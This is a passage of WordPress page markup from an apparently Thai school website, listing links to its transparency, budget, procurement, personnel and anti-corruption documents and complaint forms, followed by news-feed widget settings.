data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b